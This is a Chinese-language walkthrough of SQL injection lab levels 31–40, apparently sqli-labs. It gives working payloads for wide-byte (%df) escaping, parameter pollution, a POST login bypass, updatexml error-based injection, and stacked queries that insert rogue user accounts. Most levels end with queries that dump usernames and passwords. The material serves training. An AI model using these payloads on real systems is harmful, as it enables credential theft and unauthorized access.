三十一关
(考察内容:双引号+括号、参数污染)
这一关和二十九、三十关几乎相同,这关参数接受方式为 id = ("&id"),直接爆出数据!
?id=1&id=0") union select 1,group_concat(username,password),3 from users--+
三十二关
(基于宽字符逃逸注入;简称:宽字节注入)
简单测试或分析源码,代码中利用正则匹配将 [ /,'," ]这些三个符号都过滤掉了。
拓展学习:在mysql中,用于转义的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性,宽字节注入与HTML页面编码是无关的。
(宽字节注入原理学习地址:https://blog.csdn.net/qq_41617034/article/details/106387973)
宽字节绕过思路
(1)思路一:
由于单引号被过滤了,所以我们使用%df吃掉 \, 具体的原因是urlencode(\') = %5c%27,我们在%5c%27前面添加%df,形成%df%5c%27,而上面提到的mysql在GBK编码方式的时候会将两个字节当做一个汉字,此事%df%5c就是一个汉字 ' 運 ',%27则作为一个单独的符号在外面,同时也就达到了我们的目的。
(2)思路二
将 \' 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27的情况,后面的%5c会被前面的%5c给注释掉。这也是bypass的一种方法。
回到三十二关
?id=1%df' and '1'='1--+ 页面正常
?id=1%df' order by 3--+ 猜字段
?id=-1%df' union select 1,2,3--+ 爆出数据显示点,记得要让 id=-1 才能正常报错
直接爆数据:
?id=-1%df' union select 1,group_concat(username,password),3 from users --+
三十三关
这一关和三十二关类似,使用了addslashes()函数
话不多说,直接爆出数据 :
?id=-1%df' union select 1,group_concat(username),group_concat(password) from users --+
三十四关
(POST型宽字节注入)
使用 账户:�' or 1=1#
密码:12345 密码随便填,成功绕过并登录
为什么是 � ,这里有解答:https://www.likecs.com/show-305687828.html
回显出注入点。(注意:这关我们可以使用联合注入、报错注入。过关方式不止一种!!)
uname=�' union select 1,2#&passwd=admin&submit=Submit
爆出数据库和版本:
uname=�' union select version(),database()#&passwd=admin&submit=Submit
爆出数据
uname=�' union select (select group_concat(username,password) from users),database()#&passwd=admin&submit=Submit
三十五关
(考察点:数字型、addslashes()函数过滤。)
这一关更加简单,知道参数接受为数字型后,直接爆表、列、数据:
我们直接爆数据:
?id=-1 union select 1,group_concat(username),group_concat(password) from users
还可以报错注入:
?id=1 and updatexml(1,concat(0x7e,database()),0)
三十六关
这一关和前面的三十二关相同,使用宽字节注入即可。
直接爆数据:?id=-1%df' union select 1,group_concat(username,password),3 from users --+
或者 ?id=-1%E6' union select 1,group_concat(username,password),3 from users --+
不同的字节闭合大同小异,最终都是为了将 \ 给转化成字体,实现绕过。
三十七关
这一关是POST注入 + 单引号 + 宽字节注入。和三十四关一样,我们直接爆数据:
uname=�' union select (select group_concat(username,password) from users),database()#&passwd=admin&submit=Submit
三十八关
(考察点:GET单引号+ 堆叠注入)
使用报错注入轻松拿下这一关 :
id=1' or updatexml(1,concat(0x7e,database()),0)--+
但这关教会我们的是堆叠注入!堆叠注入原理:https://www.cnblogs.com/backlion/p/9721687.html
我们往数据库插入账户:guanjian 密码:guanjian
?id=0' ; insert into users(username,password) values('guanjian', 'guanjian')--+
查看mysql数据库,发现数据插入成功!!!
三十九关
(考察点:GET数字型+ 堆叠注入)
?id=0; insert into users(username,password) values('guanjian1', 'guanjian1')--+
查看mysql数据库,发现数据插入成功!!!注意后面的 --+ 要加上!!
堆叠注入作用:当我们无法获取对方的数据库名、表名、列名时!我们可以直接插入一个账户,直接登录对方的后台。
四十关
(考察点:GET数字型+ 堆叠注入)
我们来完整的判断一次:
第一步:猜参数接受方式
?id=1' 页面报错
?id=1'--+ 页面报错 页面无回显
?id=1')--+ 页面正常 说明参数接受方式为:id = ('&id')
第二步:猜字段
?id=1') order by 3--+ 页面正常
?id=1') order by 4--+ 页面错误 临界值为3,字段为3
第三步:爆出回显点
?id=-1') union select 1,2,3--+
直接爆数据:?id=-1') union select 1,group_concat(username,0x3b,password),3 from users--+
使用堆叠注入,和前面两个基本相同。不同在于这关参数接受方式为 单引号+括号。
总结:
(1)学会了GET型、POST型宽字节注入;(重点:深入理解宽字节的含义)
(2)各种参数接受方式的堆叠注入;(重点:了解什么是mysql的堆叠)